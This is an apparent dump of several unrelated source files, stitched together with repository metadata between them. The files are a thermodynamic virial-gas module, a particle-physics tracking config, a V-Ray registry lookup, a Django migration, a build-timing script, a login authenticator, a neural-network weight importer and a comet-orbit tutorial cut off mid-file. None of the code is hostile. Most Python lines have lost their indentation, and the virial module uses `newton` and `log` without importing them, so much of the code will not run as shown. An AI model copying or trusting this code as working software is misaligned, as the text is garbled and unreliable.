from thermo.heat_capacity import HeatCapacityGas
from .phase import Phase
from chemicals.virial import BVirial_Pitzer_Curl, Z_from_virial_density_form
class VirialCorrelationsPitzerCurl(object):
def __init__(self, Tcs, Pcs, omegas):
self.Tcs = Tcs
self.Pcs = Pcs
self.omegas = omegas
self.N = len(Tcs)
def C_pures(self, T):
return [0.0]*self.N
def dC_dT_pures(self, T):
return [0.0]*self.N
def d2C_dT2_pures(self, T):
return [0.0]*self.N
def C_interactions(self, T):
N = self.N
Ciij = [[0.0]*N for i in range(N)]
Cijj = [[0.0]*N for i in range(N)]
# Full return should be (Ciij, Ciji, Cjii), (Cijj, Cjij, Cjji)
        # but due to symmetry only those two matrices are needed
return Ciij, Cijj
def dC_dT_interactions(self, T):
N = self.N
Ciij = [[0.0]*N for i in range(N)]
Cijj = [[0.0]*N for i in range(N)]
return Ciij, Cijj
def d2C_dT2_interactions(self, T):
N = self.N
Ciij = [[0.0]*N for i in range(N)]
Cijj = [[0.0]*N for i in range(N)]
return Ciij, Cijj
def B_pures(self, T):
Tcs, Pcs, omegas = self.Tcs, self.Pcs, self.omegas
return [BVirial_Pitzer_Curl(T, Tcs[i], Pcs[i], omegas[i]) for i in range(self.N)]
def dB_dT_pures(self, T):
Tcs, Pcs, omegas = self.Tcs, self.Pcs, self.omegas
return [BVirial_Pitzer_Curl(T, Tcs[i], Pcs[i], omegas[i], 1) for i in range(self.N)]
def B_interactions(self, T):
N = self.N
return [[0.0]*N for i in range(N)]
def dB_dT_interactions(self, T):
N = self.N
return [[0.0]*N for i in range(N)]
def B_matrix(self, T):
N = self.N
B_mat = [[0.0]*N for i in range(N)]
pures = self.B_pures(T)
B_interactions = self.B_interactions(T)
for i in range(N):
B_mat[i][i] = pures[i]
for i in range(N):
for j in range(i):
B_mat[i][j] = B_interactions[i][j]
B_mat[j][i] = B_interactions[j][i]
return B_mat
def dB_dT_matrix(self, T):
N = self.N
B_mat = [[0.0]*N for i in range(N)]
pures = self.dB_dT_pures(T)
B_interactions = self.dB_dT_interactions(T)
for i in range(N):
B_mat[i][i] = pures[i]
for i in range(N):
for j in range(i):
B_mat[i][j] = B_interactions[i][j]
B_mat[j][i] = B_interactions[j][i]
return B_mat
def d2B_dT2_pures(self, T):
Tcs, Pcs, omegas = self.Tcs, self.Pcs, self.omegas
return [BVirial_Pitzer_Curl(T, Tcs[i], Pcs[i], omegas[i], 2) for i in range(self.N)]
def d2B_dT2_interactions(self, T):
N = self.N
return [[0.0]*N for i in range(N)]
def d2B_dT2_matrix(self, T):
N = self.N
B_mat = [[0.0]*N for i in range(N)]
pures = self.d2B_dT2_pures(T)
B_interactions = self.d2B_dT2_interactions(T)
for i in range(N):
B_mat[i][i] = pures[i]
for i in range(N):
for j in range(i):
B_mat[i][j] = B_interactions[i][j]
B_mat[j][i] = B_interactions[j][i]
return B_mat
class VirialGas(Phase):
phase = 'g'
force_phase = 'g'
is_gas = True
is_liquid = False
ideal_gas_basis = True
pure_references = ('HeatCapacityGases',)
pure_reference_types = (HeatCapacityGas, )
def __init__(self, model, HeatCapacityGases=None, Hfs=None, Gfs=None,
T=None, P=None, zs=None):
self.model = model
self.HeatCapacityGases = HeatCapacityGases
self.Hfs = Hfs
self.Gfs = Gfs
if Hfs is not None and Gfs is not None and None not in Hfs and None not in Gfs:
self.Sfs = [(Hfi - Gfi)/298.15 for Hfi, Gfi in zip(Hfs, Gfs)]
else:
self.Sfs = None
for i in (zs, HeatCapacityGases, Hfs, Gfs):
if i is not None:
self.N = len(i)
break
if zs is not None:
self.zs = zs
if T is not None:
self.T = T
if P is not None:
self.P = P
if T is not None and P is not None and zs is not None:
Z = Z_from_virial_density_form(T, P, self.B(), self.C())
self._V = Z*self.R*T/P
def V(self):
return self._V
def dP_dT(self):
r'''
.. math::
\left(\frac{\partial P}{\partial T}\right)_{V} = \frac{R \left(T
\left(V \frac{d}{d T} B{\left(T \right)} + \frac{d}{d T} C{\left(T
\right)}\right) + V^{2} + V B{\left(T \right)} + C{\left(T \right)}
\right)}{V^{3}}
'''
try:
return self._dP_dT
except:
pass
T, V = self.T, self._V
self._dP_dT = dP_dT = self.R*(T*(V*self.dB_dT() + self.dC_dT()) + V*(V + self.B()) + self.C())/(V*V*V)
return dP_dT
def dP_dV(self):
r'''
.. math::
\left(\frac{\partial P}{\partial V}\right)_{T} =
- \frac{R T \left(V^{2} + 2 V B{\left(T \right)} + 3 C{\left(T
\right)}\right)}{V^{4}}
'''
try:
return self._dP_dV
except:
pass
T, V = self.T, self._V
self._dP_dV = dP_dV = -self.R*T*(V*V + 2.0*V*self.B() + 3.0*self.C())/(V*V*V*V)
return dP_dV
def d2P_dTdV(self):
r'''
.. math::
\left(\frac{\partial^2 P}{\partial V\partial T}\right)_{T} =
- \frac{R \left(2 T V \frac{d}{d T} B{\left(T \right)} + 3 T
\frac{d}{d T} C{\left(T \right)} + V^{2} + 2 V B{\left(T \right)}
+ 3 C{\left(T \right)}\right)}{V^{4}}
'''
try:
return self._d2P_dTdV
except:
pass
T, V = self.T, self._V
V2 = V*V
self._d2P_dTdV = d2P_dTdV = -self.R*(2.0*T*V*self.dB_dT() + 3.0*T*self.dC_dT()
+ V2 + 2.0*V*self.B() + 3.0*self.C())/(V2*V2)
return d2P_dTdV
def d2P_dV2(self):
r'''
.. math::
\left(\frac{\partial^2 P}{\partial V^2}\right)_{T} =
\frac{2 R T \left(V^{2} + 3 V B{\left(T \right)}
+ 6 C{\left(T \right)}\right)}{V^{5}}
'''
try:
return self._d2P_dV2
except:
pass
T, V = self.T, self._V
V2 = V*V
self._d2P_dV2 = d2P_dV2 = 2.0*self.R*T*(V2 + 3.0*V*self.B() + 6.0*self.C())/(V2*V2*V)
return d2P_dV2
def d2P_dT2(self):
r'''
.. math::
\left(\frac{\partial^2 P}{\partial T^2}\right)_{V} =
\frac{R \left(T \left(V \frac{d^{2}}{d T^{2}} B{\left(T \right)}
+ \frac{d^{2}}{d T^{2}} C{\left(T \right)}\right) + 2 V \frac{d}{d T}
B{\left(T \right)} + 2 \frac{d}{d T} C{\left(T \right)}\right)}{V^{3}}
'''
try:
return self._d2P_dT2
except:
pass
T, V = self.T, self._V
V2 = V*V
self._d2P_dT2 = d2P_dT2 = self.R*(T*(V*self.d2B_dT2() + self.d2C_dT2())
+ 2.0*V*self.dB_dT() + 2.0*self.dC_dT())/(V*V*V)
return d2P_dT2
def H_dep(self):
r'''
.. math::
H_{dep} = \frac{R T^{2} \left(2 V \frac{d}{d T} B{\left(T \right)}
+ \frac{d}{d T} C{\left(T \right)}\right)}{2 V^{2}} - R T \left(-1
+ \frac{V^{2} + V B{\left(T \right)} + C{\left(T \right)}}{V^{2}}
\right)
'''
'''
from sympy import *
Z, R, T, V, P = symbols('Z, R, T, V, P')
B, C = symbols('B, C', cls=Function)
base =Eq(P*V/(R*T), 1 + B(T)/V + C(T)/V**2)
P_sln = solve(base, P)[0]
Z = P_sln*V/(R*T)
# Two ways to compute H_dep
Hdep2 = R*T - P_sln*V + integrate(P_sln - T*diff(P_sln, T), (V, oo, V))
Hdep = -R*T*(Z-1) -integrate(diff(Z, T)/V, (V, oo, V))*R*T**2
'''
try:
return self._H_dep
except:
pass
T, V = self.T, self._V
V2 = V*V
RT = self.R*T
self._H_dep = H_dep = RT*(T*(2.0*V*self.dB_dT() + self.dC_dT())/(2.0*V2)
- (-1.0 + (V2 + V*self.B() + self.C())/V2))
return H_dep
def dH_dep_dT(self):
r'''
.. math::
\frac{\partial H_{dep}}{\partial T} = \frac{R \left(2 T^{2} V
\frac{d^{2}}{d T^{2}} B{\left(T \right)} + T^{2} \frac{d^{2}}{d T^{2}}
C{\left(T \right)} + 2 T V \frac{d}{d T} B{\left(T \right)}
- 2 V B{\left(T \right)} - 2 C{\left(T \right)}\right)}{2 V^{2}}
'''
try:
return self._dH_dep_dT
except:
pass
T, V = self.T, self._V
self._dH_dep_dT = dH_dep_dT = (self.R*(2.0*T*T*V*self.d2B_dT2() + T*T*self.d2C_dT2()
+ 2.0*T*V*self.dB_dT() - 2.0*V*self.B() - 2.0*self.C())/(2.0*V*V))
return dH_dep_dT
def S_dep(self):
r'''
.. math::
S_{dep} = \frac{R \left(- T \frac{d}{d T} C{\left(T \right)} + 2 V^{2}
\ln{\left(\frac{V^{2} + V B{\left(T \right)} + C{\left(T \right)}}
{V^{2}} \right)} - 2 V \left(T \frac{d}{d T} B{\left(T \right)}
+ B{\left(T \right)}\right) - C{\left(T \right)}\right)}{2 V^{2}}
'''
'''
dP_dT = diff(P_sln, T)
S_dep = integrate(dP_dT - R/V, (V, oo, V)) + R*log(Z)
'''
try:
return self._S_dep
except:
pass
T, V = self.T, self._V
V2 = V*V
self._S_dep = S_dep = (self.R*(-T*self.dC_dT() + 2*V2*log((V2 + V*self.B() + self.C())/V**2)
- 2*V*(T*self.dB_dT() + self.B()) - self.C())/(2*V2))
return S_dep
def dS_dep_dT(self):
r'''
.. math::
\frac{\partial S_{dep}}{\partial T} = \frac{R \left(2 V^{2} \left(V
\frac{d}{d T} B{\left(T \right)} + \frac{d}{d T} C{\left(T \right)}
\right) - \left(V^{2} + V B{\left(T \right)} + C{\left(T \right)}
\right) \left(T \frac{d^{2}}{d T^{2}} C{\left(T \right)} + 2 V
\left(T \frac{d^{2}}{d T^{2}} B{\left(T \right)} + 2 \frac{d}{d T}
B{\left(T \right)}\right) + 2 \frac{d}{d T} C{\left(T \right)}
\right)\right)}{2 V^{2} \left(V^{2} + V B{\left(T \right)}
+ C{\left(T \right)}\right)}
'''
try:
return self._dS_dep_dT
except:
pass
T, V = self.T, self._V
V2 = V*V
self._dS_dep_dT = dS_dep_dT = (self.R*(2.0*V2*(V*self.dB_dT() + self.dC_dT()) - (V2 + V*self.B() + self.C())*(T*self.d2C_dT2()
+ 2.0*V*(T*self.d2B_dT2() + 2.0*self.dB_dT()) + 2.0*self.dC_dT()))/(2.0*V2*(V2 + V*self.B() + self.C())))
return dS_dep_dT
def to_TP_zs(self, T, P, zs):
new = self.__class__.__new__(self.__class__)
new.T = T
new.P = P
new.zs = zs
new.N = self.N
new.HeatCapacityGases = self.HeatCapacityGases
new.model = self.model
new.Hfs = self.Hfs
new.Gfs = self.Gfs
new.Sfs = self.Sfs
Z = Z_from_virial_density_form(T, P, new.B(), new.C())
new._V = Z*self.R*T/P
return new
def to(self, zs, T=None, P=None, V=None):
new = self.__class__.__new__(self.__class__)
new.zs = zs
new.N = self.N
new.HeatCapacityGases = self.HeatCapacityGases
new.model = model = self.model
new.Hfs = self.Hfs
new.Gfs = self.Gfs
new.Sfs = self.Sfs
if T is not None:
new.T = T
if P is not None:
new.P = P
Z = Z_from_virial_density_form(T, P, new.B(), new.C())
new._V = Z*self.R*T/P
elif V is not None:
P = new.P = self.R*T*(V*V + V*new.B() + new.C())/(V*V*V)
new._V = V
elif P is not None and V is not None:
new.P = P
# PV specified, solve for T
def err(T):
# Solve for P matching; probably there is a better solution here that does not
# require the cubic solution but this works for now
# TODO: instead of using self.to_TP_zs to allow calculating B and C,
# they should be functional
new_tmp = self.to_TP_zs(T=T, P=P, zs=zs)
B = new_tmp.B()
C = new_tmp.C()
x2 = V*V + V*B + C
x3 = self.R/(V*V*V)
P_err = T*x2*x3 - P
dP_dT = x3*(T*(V*new_tmp.dB_dT() + new_tmp.dC_dT()) + x2)
return P_err, dP_dT
T_ig = P*V/self.R # guess
T = newton(err, T_ig, fprime=True, xtol=1e-15)
new.T = T
else:
raise ValueError("Two of T, P, or V are needed")
return new
def B(self):
try:
return self._B
except:
pass
N = self.N
T = self.T
if N == 1:
return self.model.B_pures(T)[0]
zs = self.zs
B_matrix = self.model.B_matrix(T)
B = 0.0
for i in range(N):
B_tmp = 0.0
row = B_matrix[i]
for j in range(N):
                B_tmp += zs[j]*row[j]
B += zs[i]*B_tmp
self._B = B
return B
def dB_dT(self):
try:
return self._dB_dT
except:
pass
N = self.N
T = self.T
if N == 1:
return self.model.dB_dT_pures(T)[0]
zs = self.zs
dB_dT_matrix = self.model.dB_dT_matrix(T)
dB_dT = 0.0
for i in range(N):
dB_dT_tmp = 0.0
row = dB_dT_matrix[i]
for j in range(N):
                dB_dT_tmp += zs[j]*row[j]
dB_dT += zs[i]*dB_dT_tmp
self._dB_dT = dB_dT
return dB_dT
def d2B_dT2(self):
try:
return self._d2B_dT2
except:
pass
N = self.N
T = self.T
if N == 1:
return self.model.d2B_dT2_pures(T)[0]
zs = self.zs
d2B_dT2_matrix = self.model.d2B_dT2_matrix(T)
d2B_dT2 = 0.0
for i in range(N):
d2B_dT2_tmp = 0.0
row = d2B_dT2_matrix[i]
for j in range(N):
                d2B_dT2_tmp += zs[j]*row[j]
d2B_dT2 += zs[i]*d2B_dT2_tmp
self._d2B_dT2 = d2B_dT2
return d2B_dT2
def C(self):
try:
return self._C
except:
pass
T = self.T
zs = self.zs
C_pures = self.model.C_pures(T)
Ciij, Cijj = self.model.C_interactions(T)
C = 0.0
N = self.N
for i in range(N):
for j in range(N):
# poling 5-4.3b should be able to be used to take out the k loop?
for k in range(N):
if i == j == k:
Cval = C_pures[i]
elif i == j:
Cval = Ciij[i][j]
else:
Cval = Cijj[i][j]
C += zs[i]*zs[j]*zs[k]*Cval
self._C = C
return C
def dC_dT(self):
try:
return self._dC_dT
except:
pass
T = self.T
zs = self.zs
dC_dT_pures = self.model.dC_dT_pures(T)
dC_dTiij, dC_dTijj = self.model.dC_dT_interactions(T)
dC_dT = 0.0
N = self.N
for i in range(N):
for j in range(N):
# poling 5-4.3b should be able to be used to take out the k loop?
for k in range(N):
if i == j == k:
dC_dTval = dC_dT_pures[i]
elif i == j:
dC_dTval = dC_dTiij[i][j]
else:
dC_dTval = dC_dTijj[i][j]
dC_dT += zs[i]*zs[j]*zs[k]*dC_dTval
self._dC_dT = dC_dT
return dC_dT
def d2C_dT2(self):
try:
return self._d2C_dT2
except:
pass
T = self.T
zs = self.zs
d2C_dT2_pures = self.model.d2C_dT2_pures(T)
d2C_dT2iij, d2C_dT2ijj = self.model.d2C_dT2_interactions(T)
d2C_dT2 = 0.0
N = self.N
for i in range(N):
for j in range(N):
# poling 5-4.3b should be able to be used to take out the k loop?
for k in range(N):
if i == j == k:
d2C_dT2val = d2C_dT2_pures[i]
elif i == j:
d2C_dT2val = d2C_dT2iij[i][j]
else:
d2C_dT2val = d2C_dT2ijj[i][j]
d2C_dT2 += zs[i]*zs[j]*zs[k]*d2C_dT2val
self._d2C_dT2 = d2C_dT2
return d2C_dT2
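# Hedged usage sketch (added illustration, not part of the original module).
# The critical constants and composition below are made-up example values, and
# HeatCapacityGases is left as None because only volumetric/departure
# properties are queried here.
if __name__ == '__main__':
    example_model = VirialCorrelationsPitzerCurl(
        Tcs=[190.6, 305.3], Pcs=[4.6e6, 4.9e6], omegas=[0.008, 0.098])
    example_gas = VirialGas(example_model, HeatCapacityGases=None,
                            T=300.0, P=1e5, zs=[0.5, 0.5])
    print(example_gas.V(), example_gas.H_dep(), example_gas.S_dep())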
|
DQM/TrackingMonitorSource/python/TrackingSourceConfigP5_cff.py
|
malbouis/cmssw
| 852 |
123106
|
<reponame>malbouis/cmssw<filename>DQM/TrackingMonitorSource/python/TrackingSourceConfigP5_cff.py
import FWCore.ParameterSet.Config as cms
# TrackingMonitor ####
# Clone for Cosmic Track Finder
from DQM.TrackingMonitor.TrackerCosmicsTrackingMonitor_cfi import *
TrackMon_cosmicTk = TrackerCosmicTrackMon.clone(
TrackProducer = 'cosmictrackfinderP5',
AlgoName = 'CosmicTk',
FolderName = 'Tracking/TrackParameters',
doSeedParameterHistos = True,
TkSizeBin = 4,
TkSizeMax = 3.5,
TkSizeMin = -0.5
)
# Clone for CKF Tracks
from DQM.TrackingMonitor.TrackerCosmicsTrackingMonitor_cfi import *
TrackMon_ckf = TrackerCosmicTrackMon.clone(
TrackProducer = 'ctfWithMaterialTracksP5',
AlgoName = 'CKFTk',
FolderName = 'Tracking/TrackParameters',
doSeedParameterHistos = True,
TkSizeBin = 4,
TkSizeMax = 3.5,
TkSizeMin = -0.5
)
# Clone for Road Search Tracks
# from DQM.TrackingMonitor.TrackerCosmicsTrackingMonitor_cfi import *
# TrackMon_rs = TrackerCosmicTrackMon.clone(
# TrackProducer = 'rsWithMaterialTracksP5',
# AlgoName = 'RSTk',
# FolderName = 'Tracking/TrackParameters',
# doSeedParameterHistos = True
# )
# Clone for General Track (for Collision data)
from DQM.TrackingMonitor.TrackerCollisionTrackingMonitor_cfi import *
TrackMon_gentk = TrackerCollisionTrackMon.clone(
FolderName = 'Tracking/TrackParameters',
BSFolderName = 'Tracking/TrackParameters/BeamSpotParameters'
# decrease number of histograms
# doTrackerSpecific = False
)
# Clone for Heavy Ion Tracks (for HI Collisions)
from DQM.TrackingMonitor.TrackerHeavyIonTrackingMonitor_cfi import *
TrackMon_hi = TrackerHeavyIonTrackMon.clone(
FolderName = 'Tracking/TrackParameters',
BSFolderName = 'Tracking/TrackParameters/BeamSpotParameters'
)
# Tracking Efficiency ####
# Clone for Cosmic Tracks
from DQM.TrackingMonitor.TrackEfficiencyMonitor_cfi import *
TrackEffMon_cosmicTk = TrackEffMon.clone(
TKTrackCollection = 'cosmictrackfinderP5',
AlgoName = 'CosmicTk',
FolderName = 'Tracking/TrackParameters/TrackEfficiency'
)
# Clone for CKF Tracks
from DQM.TrackingMonitor.TrackEfficiencyMonitor_cfi import *
TrackEffMon_ckf = TrackEffMon.clone(
TKTrackCollection = 'ctfWithMaterialTracksP5',
AlgoName = 'CKFTk',
FolderName = 'Tracking/TrackParameters/TrackEfficiency'
)
# Clone for RS Tracks
# from DQM.TrackingMonitor.TrackEfficiencyMonitor_cfi import *
# TrackEffMon_rs = TrackEffMon.clone(
# TKTrackCollection = 'rsWithMaterialTracksP5',
# AlgoName = 'RSTk',
# FolderName = 'Tracking/TrackParameters/TrackEfficiency'
# )
# Clone for Beam Halo Tracks
from DQM.TrackingMonitor.TrackEfficiencyMonitor_cfi import *
TrackEffMon_bhmuon = TrackEffMon.clone(
TKTrackCollection = 'ctfWithMaterialTracksBeamHaloMuon',
AlgoName = 'BHMuonTk',
FolderName = 'Tracking/TrackParameters/TrackEfficiency'
)
# Clone for Heavy Ion Tracks (for HI Collisions)
from DQM.TrackingMonitor.TrackEfficiencyMonitor_cfi import *
TrackEffMon_hi = TrackEffMon.clone(
TKTrackCollection = 'hiGeneralTracks',
AlgoName = 'HeavyIonTk',
FolderName = 'Tracking/TrackParameters/TrackEfficiency'
)
|
Tools/Find V-Ray Versions/GetVRayVersions.py
|
aplishka-az/Deadline
| 113 |
123110
|
<reponame>aplishka-az/Deadline<filename>Tools/Find V-Ray Versions/GetVRayVersions.py
import _winreg
import pprint
SOFTWARE = 'V-Ray'
try:
i = 0
explorer = _winreg.OpenKey(
_winreg.HKEY_LOCAL_MACHINE,
'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall'
)
while True:
key = _winreg.EnumKey(explorer, i)
if SOFTWARE in key:
item = _winreg.OpenKey(explorer, key)
version, type = _winreg.QueryValueEx(item, "DisplayVersion")
_winreg.CloseKey(item)
print('{0}:\n\t{1}'.format(key, version))
i += 1
except WindowsError as e:
print(e)
_winreg.CloseKey(explorer)
|
openbook_posts/migrations/0003_postreaction_emoji.py
|
TamaraAbells/okuna-api
| 164 |
123122
|
<gh_stars>100-1000
# Generated by Django 2.1.2 on 2018-10-22 12:26
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('openbook_posts', '0002_auto_20181022_1406'),
]
operations = [
migrations.AddField(
model_name='postreaction',
name='emoji',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, related_name='reactions', to='openbook_posts.PostReactionEmoji'),
preserve_default=False,
),
]
|
Qt-Widgets-and-more/compileTime/time-compile.py
|
jgompis/kdabtv
| 140 |
123134
|
import subprocess, re, sys, os, os.path, shutil, time, glob
ROOT="/home/blackie/dump/KDABViewer"
BUILDROOT=ROOT+"/build"
ITERATIONS=5
FOREAL=1
CCACHE="/usr/lib/ccache"
def runCommand(cmd):
print(" ".join(cmd))
if FOREAL:
process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
res = process.communicate()[0]
#print(res)
def nukeBuildDir():
if FOREAL:
shutil.rmtree(BUILDROOT)
os.mkdir(BUILDROOT)
def clearCCache():
runCommand(["/usr/bin/ccache", "-C"])
def runCMake(clang, ninja, define=None):
command=["cmake"]
if clang:
command = command + ["-DCMAKE_CXX_COMPILER=clang++"]
if ninja:
command = command + ["-G", "Ninja"]
if define:
command = command + ["-DCMAKE_CXX_FLAGS=-D" + define]
command = command + [".."]
runCommand(command)
def compile(ninja):
os.environ["MAKEFLAGS"]="-j 16"
command = ["make", "-j", "16"]
if ninja:
command = ["ninja"]
runCommand(command)
def setOutputFile(filename):
global TIMINGFILE
TIMINGFILE="/home/blackie/profiling/"+filename
writeHeader()
def writeHeader():
FILE = open(TIMINGFILE, "w")
FILE.write("compiler,build system,cclang on,stage,time\n")
def addOutputLine(clang,ninja,step,time):
FILE = open(TIMINGFILE, "a+")
ccacheon = "ccache" in os.environ["PATH"]
FILE.write("%s,%s,%s,%s,%s\n" % ("clang" if clang else "gcc", "ninja" if ninja else "make", "yes" if ccacheon else "no", step, int(round(time))))
def makeClean(ninja):
runCommand(["ninja" if ninja else "make", "clean"])
def timeAndWrite(clang,ninja,step):
start=time.time()
compile(ninja)
end = time.time()
addOutputLine(clang,ninja, step, end-start)
def setOrUnsetCCacheInPath(doInclude):
path = os.environ["PATH"].split(":")
    path = [item for item in path if "ccache" not in item]
if doInclude:
path = [CCACHE] + path
os.environ["PATH"] = ":".join(path)
# ---------------------------- Test functions
def oneGoWithCompilterAndBuildSystem(clang,ninja):
clearCCache()
nukeBuildDir()
os.chdir(BUILDROOT)
runCMake(clang=clang, ninja=ninja)
timeAndWrite(clang, ninja, "full build")
# rebuild after make clean
clearCCache()
makeClean(ninja)
timeAndWrite(clang, ninja, "clean build")
def compileAndBuildSystemTest():
setOutputFile("compilerAndBuild.csv")
setOrUnsetCCacheInPath(0)
for round in range(ITERATIONS):
print("compileAndBuildSystemTest------> Round %d of %d" % (round+1, ITERATIONS))
for ninja in [0, 1]:
for clang in [0,1]:
oneGoWithCompilterAndBuildSystem(clang=clang,ninja=ninja)
def ccacheTest():
setOutputFile("ccache.csv")
for useccache in [0,1]:
setOrUnsetCCacheInPath(useccache)
for round in range(ITERATIONS):
print("ccacheTest------> Round %d of %d (using CCache=%s)" % (useccache*ITERATIONS + round+1, ITERATIONS*2,"yes" if useccache else "no"))
oneGoWithCompilterAndBuildSystem(clang=1, ninja=1)
def runPCHMutation(headers):
for index in range(len(headers)+1):
subList = headers[:index]
if FOREAL:
FILE = open(ROOT + "/KDABViewer_pch.h","w")
for x in subList:
FILE.write("#include <%s>\n" % x)
FILE.close()
nukeBuildDir()
os.chdir(BUILDROOT)
runCMake(clang=1,ninja=1)
compile(ninja=1)
for round in range(ITERATIONS):
print("pchTest------> Round %d of %d" % (index*ITERATIONS + round+1, ITERATIONS*len(headers)+1))
clearCCache()
makeClean(ninja=1)
timeAndWrite(clang=1, ninja=1, step="/" + "/".join(subList))
def pchTest():
setOutputFile("PCH.csv")
setOrUnsetCCacheInPath(0)
runPCHMutation(["QtWidgets", "QtGui", "QtCore", "KDChart", "memory", "functional"]) # "chrono", "cmath", "optional", "mutex", "array", "vector", "numeric", "algorithm"
runPCHMutation(["QtCore", "QtGui", "QtWidgets"])
# -------- pchMostUsedTest
REGEXP = re.compile("^#include *<(Q.*/)?([a-zA-Z_]+)>")
def countIncludes(filename, map):
with open(filename) as fp:
for line in fp.readlines():
match = REGEXP.match(line)
if match:
str = match.group(2)
if str in map:
map[str]= map[str]+1
else:
map[str] = 1
def findSystemIncludes():
map = {}
for filename in glob.glob(ROOT + "/**/*.cpp", recursive=1)+ glob.glob(ROOT + "/**/*.h",recursive=1) :
if "3rdparty" in filename or "prefix" in filename or "xternal" in filename:
continue
countIncludes(filename, map)
list = sorted(map.items(), key=lambda x: x[1])
list.reverse()
print(list)
return [key for (key,count) in list]
def pchMostUsedTest():
setOutputFile("PCH-most-used.csv")
setOrUnsetCCacheInPath(0)
nukeBuildDir()
os.chdir(BUILDROOT)
# We need to build it all first, so we get all the ui_* files into existance
runCMake(clang=1,ninja=1)
compile(ninja=1)
list = findSystemIncludes()
steps=len(list)
for stage in range(steps):
with open(ROOT + "/KDABViewer_pch.h","w") as FILE:
for i in range(stage):
FILE.write("#include<%s>\n" % list[i])
runCMake(clang=1,ninja=1)
compile(ninja=1)
for round in range(ITERATIONS):
print("pchMostUsedTest------> Round %d of %d" % (stage*ITERATIONS + round+1, ITERATIONS*steps))
makeClean(ninja=1)
timeAndWrite(clang=1, ninja=1, step="%d" % stage)
#compileAndBuildSystemTest()
#ccacheTest()
#pchTest()
#pchMostUsedTest()
|
lwp/authenticators/database.py
|
cocoy/LXC-Web-Panel
| 237 |
123158
|
<gh_stars>100-1000
# -*- coding: utf-8 -*-
from lwp.utils import query_db, hash_passwd
class database:
def authenticate(self, username, password):
hash_password = hash_passwd(password)
return query_db('select name, username, su from users where username=? and password=?', [username, hash_password], one=True)
|
avionics/firmware/startup/build_rules.bzl
|
leozz37/makani
| 1,178 |
123164
|
<reponame>leozz37/makani<filename>avionics/firmware/startup/build_rules.bzl
"""This module contains rules for the startup c library."""
load("//lib/bazel:c_rules.bzl", "makani_c_library")
def _get_linkopts(ld_files):
return (["-Tavionics/firmware/startup/" + f for f in ld_files])
def startup_c_library(name, deps = [], ld_files = [], linkopts = [], **kwargs):
makani_c_library(
name = name,
deps = deps + ld_files,
linkopts = linkopts + _get_linkopts(ld_files),
**kwargs
)
|
examples/neural_network_vgg7/import_vgg7.py
|
dSandley20/KomputeParticles
| 445 |
123205
|
import numpy
import json
import os
import sys
import time
import sh_common
if len(sys.argv) != 2:
print("import_vgg7.py JSONPATH")
print(" i.e. import_vgg7.py /home/you/Documents/External/waifu2x/models/vgg_7/art/scale2.0x_model.json")
sys.exit(1)
try:
os.mkdir("model-kipper")
except:
pass
data_list = json.load(open(sys.argv[1], "rb"))
idx = 0
for i in range(7):
layer = data_list[i]
w = numpy.array(layer["weight"])
    w = w.reshape((-1, 3, 3)).transpose((0, 2, 1))
b = numpy.array(layer["bias"])
sh_common.save_param("kipper", idx, w)
idx += 1
sh_common.save_param("kipper", idx, b)
idx += 1
|
part9/SpaceSciencePython_part9.py
|
ajpmaclean/SpaceScienceTutorial
| 167 |
123236
|
# Import the standard modules
import sqlite3
import spiceypy
# Import the installed modules
import pandas as pd
import numpy as np
# Import matplotlib for plotting
from matplotlib import pyplot as plt
# Import scipy for the Kernel Density Estimator functionality
from scipy import stats
#%%
# Connect to the comet database. This database has been created in tutorial
# part 7, however, due to its small size the database is uploaded on GitHub
con = sqlite3.connect('../_databases/_comets/mpc_comets.db')
# Set a cursor
cur = con.cursor()
# Create a pandas dataframe that contains the name of the comet (needed later),
# the semi-major axis, inclination and eccentricity
# for P type ...
P_TYPE_DF = pd.read_sql('SELECT NAME, SEMI_MAJOR_AXIS_AU, INCLINATION_DEG, ' \
'ECCENTRICITY FROM comets_main WHERE ORBIT_TYPE="P"', \
con)
# ... and C type comets. For this type: set the eccentricity smaller than 1
# (bound orbits)
C_TYPE_DF = pd.read_sql('SELECT NAME, SEMI_MAJOR_AXIS_AU, INCLINATION_DEG, ' \
'ECCENTRICITY FROM comets_main WHERE ORBIT_TYPE="C" ' \
'AND ECCENTRICITY<1', con)
#%%
# The Tisserand parameter will help us to distinguish between Jupiter Family
# Comets (JFCs) and Non-JFCs more easily. For this parameter (next block) we
# need the semi-major axis of Jupiter
# Import a kernel meta file
spiceypy.furnsh('kernel_meta.txt')
# Set any Ephemeris time (ET)
SAMPLE_ET = spiceypy.utc2et('2000-001T00:00:00')
# Compute the state vector of Jupiter in ECLIPJ2000 (Jupiter (599) is not
# available in the kernel, we use the barycentre (5))
STATE_VEC_JUPITER, _ = spiceypy.spkgeo(targ=5, \
et=SAMPLE_ET, \
ref='ECLIPJ2000', \
obs=10)
# Get the G*M value of the Sun
_, GM_SUN_PRE = spiceypy.bodvcd(bodyid=10, item='GM', maxn=1)
GM_SUN = GM_SUN_PRE[0]
# Compute the orbital elements of Jupiter
ORB_ELEM_JUPITER = spiceypy.oscltx(STATE_VEC_JUPITER, SAMPLE_ET, GM_SUN)
# Get the semi-major axis value
A_JUPITER_KM = ORB_ELEM_JUPITER[-2]
# Convert the value from km to AU
A_JUPITER_AU = spiceypy.convrt(A_JUPITER_KM, 'km', 'AU')
#%%
# Define a lambda function for the Tisserand parameter, a, i and e are the
# input parameters semi-major axis, inclination and eccentricity, respectively
tisr_jup = lambda a, i, e: (A_JUPITER_AU / a) + 2 * np.cos(i) \
* np.sqrt((a / A_JUPITER_AU) * (1 - (e**2.0)))
# Create new dataframe columns that contain the Tisserand parameter
P_TYPE_DF.loc[:, 'TISSERAND_JUP'] = \
P_TYPE_DF.apply(lambda x: (tisr_jup(a=x['SEMI_MAJOR_AXIS_AU'], \
i=np.radians(x['INCLINATION_DEG']), \
e=x['ECCENTRICITY'])), axis=1)
C_TYPE_DF.loc[:, 'TISSERAND_JUP'] = \
C_TYPE_DF.apply(lambda x: (tisr_jup(a=x['SEMI_MAJOR_AXIS_AU'], \
i=np.radians(x['INCLINATION_DEG']), \
e=x['ECCENTRICITY'])), axis=1)
#%%
# Print some descriptive statistics of the P type comets
print('Descriptive statistics of the Tisserand parameter of P type comets')
print(f'{P_TYPE_DF["TISSERAND_JUP"].describe()}')
print('\n')
# Compute the percentage of Jupiter-Family Comets (JFCs) based on P types
